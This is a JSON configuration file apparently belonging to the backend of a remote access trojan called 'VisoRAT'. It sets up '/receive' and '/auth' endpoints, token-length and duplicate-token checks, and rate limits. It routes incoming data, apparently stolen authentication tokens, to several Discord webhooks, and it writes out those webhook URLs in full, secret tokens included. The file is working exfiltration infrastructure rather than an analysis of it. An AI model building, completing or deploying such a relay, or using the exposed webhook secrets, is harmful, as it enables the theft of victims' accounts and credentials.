{
    "security": {
        "rate_limit_seconds": 600,
        "min_token_length": 128,
        "check_duplicate_tokens": true
    },
    "endpoints": {
        "/receive": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1529470555516961032/DCUnROspzjImh6xm8Rw9-KjjpOSnXrHu_MATwJsrJcD617Ok7I0WejQRfVcmbKxksqtW",
                    "name": "D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                },
                {
                    "url": "https://discord.com/api/webhooks/1529470555516961032/DCUnROspzjImh6xm8Rw9-KjjpOSnXrHu_MATwJsrJcD617Ok7I0WejQRfVcmbKxksqtW", 
                    "name": "RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        },
        "/auth": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1529470555516961032/DCUnROspzjImh6xm8Rw9-KjjpOSnXrHu_MATwJsrJcD617Ok7I0WejQRfVcmbKxksqtW",
                    "name": "Not D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        }
    }
}
